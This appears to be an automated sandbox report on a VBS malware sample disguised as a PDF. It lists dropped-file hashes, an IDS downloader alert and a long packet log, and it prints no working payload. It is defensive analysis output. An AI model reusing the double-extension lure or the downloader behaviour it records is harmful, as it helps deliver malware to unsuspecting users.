                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:NlllulJnp/p:NllU
                                      MD5:BC6DB77EB243BF62DC31267706650173
                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e.................................X..............@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):476220
                                      Entropy (8bit):5.972881545593495
                                      Encrypted:false
                                      SSDEEP:12288:8FtXgHSg3X58XaBqQKWrhirJwIQ/+kVNN6Jpz:8nXgyMX5yaBq2tirhFNJ5
                                      MD5:14B49DCB01461BFC4769023A403A5B1A
                                      SHA1:C30A85BF569D584E918FE93BE93494C76B119ADD
                                      SHA-256:1E8E511894D67DADB6441A4B9E9315D4F2CE396B89D6FC7631EE2FF5F103556B
                                      SHA-512:89089191D855F064B69A6B1499C25BDC0A5842E167DC17448BF18AA8AA4EC3ABB7A852BDFBFC3ACFBA7C4240602536F52EFCD31978D74E71A232E2F0EF21B42B
                                      Malicious:false
                                      File type:ASCII text, with CRLF line terminators
                                      Entropy (8bit):4.950594238827333
                                      TrID:
                                      • Visual Basic Script (13500/0) 100.00%
                                      File name:18000012550_20240930_0078864246#U00b7pdf.vbs
                                      File size:71'970 bytes
                                      MD5:89985981616f5fdef265814322d9735d
                                      SHA1:a7a505cea8373907fec133bf34d8d38e86e4dfb2
                                      SHA256:701bac7c15873d9eadaf8a70ca969adb5d3036421f1872cc706adafc51f7f751
                                      SHA512:9129378a54842082be7097682acf92536c0fe2953d02ed8c27acd7d5e172c0c72b72993b9e4ce0ae208ee751187a66c0bd82771a40a4d6a63b052d7553d50eea
                                      SSDEEP:1536:sFfpwpBuWDXAU8M9CTszU4+fsEkbf11CLmVYf:sFfWSIA7MOfsEEfEf
                                      TLSH:71635C2199D5063E0FC30798E942F9458C7D8D3A0E168CECA589E69E1C33C7CD67B26B
                                      File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi
                                      Icon Hash:68d69b8f86ab9a86
                                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                      2024-10-01T07:47:18.943896+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49709 | 216.58.206.78 | 443 | TCP
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Oct 1, 2024 07:46:46.911923885 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.913978100 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.916045904 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.916085005 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.916101933 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.916129112 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.916176081 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.918369055 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.920388937 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.920425892 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.920437098 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.920444965 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.920485973 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.922502995 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.924675941 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.924741030 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.924750090 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.926877975 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.926934004 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.926939964 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.929255009 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.929294109 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.929315090 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.929323912 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.929358959 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.931258917 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.933399916 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.933439970 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.933465004 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.933473110 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.933518887 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.935585976 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.937649012 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.937716007 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.937738895 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.939759970 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.939810991 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.939831018 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.941793919 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.941849947 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.941854954 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.941870928 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.941910982 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.943829060 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.945940018 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.945982933 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.946001053 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.946019888 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.946059942 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.948132038 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.950117111 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.950158119 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.950177908 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.950201988 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.950242996 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.952056885 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.954061031 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.954102993 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.954119921 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.954143047 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.954179049 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.956171036 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.958101034 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.958143950 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.958148003 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.958157063 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.958194017 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.960006952 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.962001085 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.962028980 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.962044001 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.962059975 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.962095022 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.962101936 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.963994026 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.964037895 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.964050055 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.965928078 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.965970039 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.965981007 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.967897892 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.967937946 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.967948914 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.969732046 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.969785929 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.969800949 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.971679926 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.971721888 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.971738100 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.973524094 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.973582029 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.973597050 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.975374937 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.975419998 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.975435019 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.977278948 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.977320910 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.977330923 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.979125023 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.979170084 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.979186058 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.980838060 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.980880022 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.980890989 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.982697010 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.982738018 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.982743979 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.984390020 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.984432936 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.984438896 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.986386061 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.986429930 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.986437082 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.988010883 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.988050938 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.988056898 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.989629984 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.989702940 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.989708900 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.991569996 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.991619110 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.991625071 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.993823051 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.993866920 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.993877888 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.995971918 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.996011972 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.996020079 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.996637106 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.996676922 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.996684074 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.998207092 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.998246908 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:46.998254061 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:46.999943972 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.000020027 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.000025988 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.001149893 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.001188040 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.001197100 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.002598047 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.002646923 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.002652884 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.004036903 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.004077911 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.004085064 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.005450010 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.005484104 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.005494118 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.005503893 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.005542994 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.006850958 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.008265972 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.008299112 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.008302927 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.008308887 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.008339882 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.010339022 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.012473106 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.012506962 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.012528896 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.012535095 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.012546062 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.012567997 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.016823053 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.016853094 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.016865969 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.016874075 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.016902924 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.016908884 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.016915083 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.016949892 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.017076969 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.023176908 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.023224115 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.023230076 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.023271084 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.023303032 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.023303986 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.023314953 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.023344994 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.023350954 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.029536009 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.029587984 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.029594898 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.029658079 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.029684067 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.029692888 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.029699087 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.029731989 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.033909082 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.033955097 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.033987045 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.033994913 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.034002066 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.034035921 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.034040928 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.040040970 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.040088892 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.040096998 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.040107012 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.040141106 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.040148973 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.040184975 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.040214062 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.040220022 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.045685053 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.045727968 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.045734882 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.045794964 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.045828104 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.045835972 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.045841932 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.045880079 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.045886040 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.051692009 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.051726103 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.051750898 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.051762104 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.051774025 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.051795006 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.051856041 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.051883936 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.051888943 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.051901102 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.051939011 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.057383060 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.057457924 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.057512999 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.057538986 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.057787895 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.057841063 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.057849884 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.063091040 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.063116074 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.063138962 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.063146114 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.063170910 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.063186884 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.063194036 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.063235998 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.063549042 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.066898108 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.066926956 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.066941977 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.066948891 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.066977024 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.066986084 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.066992044 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.067034960 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.067266941 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.072088003 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.072113037 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.072134972 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.072143078 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.072170973 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.072180033 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.072186947 CEST44349707142.250.185.97192.168.2.9
